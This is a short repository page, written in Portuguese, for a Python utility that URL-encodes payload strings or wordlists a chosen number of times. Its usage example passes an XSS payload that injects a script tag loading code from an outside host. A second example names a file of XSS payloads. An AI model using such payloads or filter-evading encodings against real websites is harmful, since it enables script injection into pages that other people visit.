ticofookfook / Converte_url

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Converte_url

Passe para o programa uma unica string ou um arquivo de payloads para converter

instalar=> pip install termcolor


Uso exemplo para string: python3 url_encode.py -s "><script src=\"https://js.rip/j14fkfemu3\"></script> -n 3


Uso exemplo para wordlist.txt: python3 url_encode.py -w xss_good.txt -n 3


About


Languages

Language:Python 100.0%